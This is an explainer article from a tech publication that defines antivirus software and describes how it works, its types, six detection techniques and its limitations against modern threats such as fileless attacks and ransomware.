Security.com

antivirus software (antivirus program)

By Kinza Yasar

What is antivirus software (antivirus program)?

Antivirus software (antivirus program) is a security program designed to prevent, detect, search and remove viruses and other types of malware from computers, networks and other devices. Often included as part of a security package, antivirus software can also be purchased as a standalone option.

Typically installed on a computer as a proactive approach to cybersecurity, an antivirus program can help mitigate a variety of cyber threats, including keyloggers, browser hijackers, Trojan horses, worms, rootkits, spyware, adware, botnets, phishing attempts and ransomware attacks.

Due to the constantly evolving nature of cybercrimes and new versions of malware being released daily, including zero-day attacks, no antivirus program can offer detection and protection against all threat vectors.

How antivirus software works

Antivirus software typically runs as a background process, scanning computers, servers or mobile devices to detect and restrict the spread of malware. Many antivirus software programs include real-time threat detection and protection to guard against potential vulnerabilities and perform system scans that monitor device and system files, looking for possible risks.

Antivirus software usually performs the following basic functions:

To scan systems comprehensively, antivirus software must generally be given privileged access to the entire system. This makes antivirus software itself a common target for attackers, and researchers have discovered remote code execution and other serious vulnerabilities in antivirus software products in recent years.

Benefits of antivirus software

The purpose of antivirus software isn't only to defend a system against security threats and vulnerabilities, but also to provide real-time protection through automated vulnerability scans.

Antivirus software provides the following benefits:

Types of antivirus programs

Antivirus software is distributed in several forms, including standalone antivirus scanners, machine learning and cloud-based programs, malware signatures and internet security software suites that offer antivirus protection, along with firewalls, privacy controls and other security protections. Popular providers of both free and commercial antivirus products include AVG Technologies, Kaspersky, Malwarebytes, McAfee, Norton and Trend Micro.

Some antivirus software vendors offer basic versions of their products at no charge. These free versions generally offer basic antivirus and spyware protection, but more advanced features and protections are usually available only to paying customers.

While some OSes are targeted more frequently by virus developers, antivirus software is available for most OSes:

Virus detection techniques

Antivirus software uses a variety of virus detection techniques. The following are six common types:

  1. Signature-based detection. Antivirus programs typically depend on stored virus signatures -- unique strings of data that are characteristic of known malware to flag malicious software. The antivirus software uses these signatures to identify viruses it encounters that security experts have already identified and analyzed.
  2. Heuristic-based detection. This type of detection uses an algorithm to compare the signatures of known viruses against potential threats. With heuristic-based detection, antivirus software can detect viruses that haven't been discovered yet, as well as existing viruses that have been disguised or modified and released as new viruses. However, this method can also generate false-positive matches when antivirus software detects a program behaving similarly to a malicious program and incorrectly identifies it as a virus.
  3. Behavior-based detection. Antivirus software can also use behavior-based detection to analyze an object's behavior or potential behavior for suspicious activities and infers malicious intent based on those observations. For example, code that attempts to perform unauthorized or abnormal actions would indicate the object is malicious or, at least, suspicious. Some examples of behaviors that potentially signal danger include modifying or deleting large numbers of files, monitoring keystrokes, changing settings of other programs and remotely connecting to computers.
  4. Cloud analysis. According to Atlas VPN, on average, hackers produced more than 316,000 malware threats daily in 2022. Since it's impossible for any antivirus program to combat the vast number of rapidly appearing malware variants, antivirus companies now provide cloud analysis as part of their antivirus offerings. Cloud analysis is a modern way of performing malware analysis, as it's done on the cloud using the antivirus vendor's servers. This way, if a malicious file or program is detected by the antivirus program, it's sent to the vendor's labs, where it's tested. If it's confirmed to be malicious, a signature is created for it, which blocks it from all the other devices where it's detected.
  5. Sandbox analysis. This detection technique runs a program or file in a virtual sandbox environment to analyze its behavior before permitting it into the system. Using this technique, antivirus software only permits a file to execute in the real environment if the sandbox analysis confirms it to be safe. This feature is also used for running files that the antivirus program is unable to allowlist or denylist. Since the files are executed in an isolated environment, even if they end up being malicious, no harm is done to the system, as they're only executed in a virtual sandbox container.
  6. Host intrusion prevention system (HIPS). Security and antivirus software commonly uses this technology to detect potentially malicious activities in a program using signature-based detection. A HIPS continuously monitors each activity and instantly notifies users by presenting them with authorization options, such as Allow and Block.

Challenges facing antivirus software

According to CyberCrime Magazine, 90% of the world's population, ages 6 and older, will be connected to the internet by 2030. This exponential growth in internet connections is also responsible for the significant rise in viruses and cyber attacks.

While antivirus programs were originally developed to combat viruses and cyber threats, they do come with a few limitations.

The following highlights the current and future challenges of antivirus software:

Ever-evolving trends in technology, including metaverse, Web3, fintech and autonomous vehicles, make it more challenging to get the right antivirus protection. With so many endpoints to secure -- from crypto wallets to virtual reality devices -- there are times that antivirus software could fall short. Most traditional antivirus technologies can't detect modern fileless attacks that use trusted systems, such as PowerShell, to carry out the attacks.

While antivirus software can mitigate certain ransomware attacks, it can't stop or remove ransomware once it's taken control of a system. Here's a step-by-step guide on how to remove ransomware and minimize its effect.

15 Mar 2023

All Rights Reserved, Copyright 2000 - 2024, TechTarget | Read our Privacy Statement